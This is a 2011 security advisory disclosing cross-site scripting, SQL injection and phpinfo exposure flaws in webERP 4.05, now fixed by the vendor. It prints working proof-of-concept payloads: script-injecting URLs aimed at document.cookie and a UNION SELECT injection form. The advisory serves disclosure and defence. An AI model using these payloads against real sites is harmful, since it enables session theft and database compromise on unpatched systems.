Total Tests:

Multiple Vulnerabilities in webERP

Advisory ID:HTB23055
Product:webERP
Vendor:www.weberp.org
Vulnerable Versions:4.05 and probably prior
Tested Version:4.05
Advisory Publication:October 26, 2011 [without technical details]
Vendor Notification:October 26, 2011
Public Disclosure:November 17, 2011
Latest Update:November 16, 2011
Vulnerability Type:Cross-Site Scripting [CWE-79]
SQL Injection [CWE-89]
Information Exposure [CWE-200]
Risk Level:High
CVSSv2 Base Scores:4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
Solution Status:Fixed by Vendor
Discovered and Provided:High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in webERP, which can be exploited to perform information disclosure, cross-site scripting and SQL injection attacks.

1) Cross-Site Scripting (XSS) vulnerabilities in webERP
Input appended to the URL in multiple files is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
The following PoC code is available:
http://[host]/doc/manual/manualcontents.php/%22%3E%3Cscript%3Ealert%28docume nt.cookie%29;%3C/script%3E
http://[host]/index.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/scr ipt%3E
http://[host]/AccountGroups.php/%22%3E%3Cscript%3Ealert%28document.cookie%29 ;%3C/script%3E
http://[host]/AccountSections.php/%22%3E%3Cscript%3Ealert%28document.cookie% 29;%3C/script%3E
http://[host]/AddCustomerContacts.php/%22%3E%3Cscript%3Ealert%28document.coo kie%29;%3C/script%3E%3C/html%3E
http://[host]/AddCustomerNotes.php/%22%3E%3Cscript%3Ealert%28document.cookie %29;%3C/script%3E%3C/html%3E
http://[host]/Areas.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/scr ipt%3E
http://[host]/AddCustomerTypeNotes.php/%22%3E%3Cscript%3Ealert%28document.co okie%29;%3C/script%3E
http://[host]/AgedDebtors.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;% 3C/script%3E
http://[host]/AgedSuppliers.php/%22%3E%3Cscript%3Ealert%28document.cookie%29 ;%3C/script%3E
Successful exploitation of this vulnerabilities requires that Apache's directive "AcceptPathInfo" is set to "on" or "default" (default value is "default").

2) SQL Injection vulnerabilities in webERP
2.1 Input passed via the "reportid" GET parameter to /reportwriter/ReportMaker.php is not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http://[host]/reportwriter/ReportMaker.php?action=go&reportid=SQL_CODE_HERE
Successful exploitation of this vulnerability requires attacker to be registered and logged-in.
2.2 Input passed via the "ReportID" POST parameter to /reportwriter/FormMaker.php is not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
<form action="http://[host]/reportwriter/FormMaker.php" method="post">
<input type="hidden" name="ReportID" value="1 union select version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20">
<input type="hidden" name="FormID" value="[FormID]" />
<input type="hidden" name="todo" value="Criteria Setup" />
<input type="submit" value="submit" id="btn">
</form>

Successful exploitation of this vulnerability requires attacker to be registered and logged-in.

3) Information Disclosure in webERP
The "phpinfo.php" script is stored with insecure permissions inside the web root.
This can be exploited to gain knowledge of sensitive information (e.g. PHP configuration details) by accessing the file directly.
The following PoC code is available:
http://[host]/phpinfo.php

How to Detect Cross-Site Scripting Vulnerabilities
Website Security Test
  • GDPR & PCI DSS Test
  • Website CMS Security Test
  • CSP & HTTP Headers Check
  • WordPress & Drupal Scanning
Try For Free

Solution:
Upgrade to 4.06RC2 or later version
http://www.weberp.org/HomePage/history


References:
[1] High-Tech Bridge Advisory HTB23055 - https://www.immuniweb.com/advisory/HTB23055 - Multiple Vulnerabilities in webERP
[2] webERP - weberp.org - webERP is a complete web based accounting and business management system that requires only a web-browser and pdf reader to use.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
Book a Call Ask a Question
Close
Talk to ImmuniWeb Experts
ImmuniWeb AI Platform
Have a technical question?

Our security experts will answer within
one business day. No obligations.

Have a sales question?
Email:
Tel: +41 22 560 6800 (Switzerland)
Tel: +1 720 605 9147 (USA)
*
*
*
Your data will stay private and confidential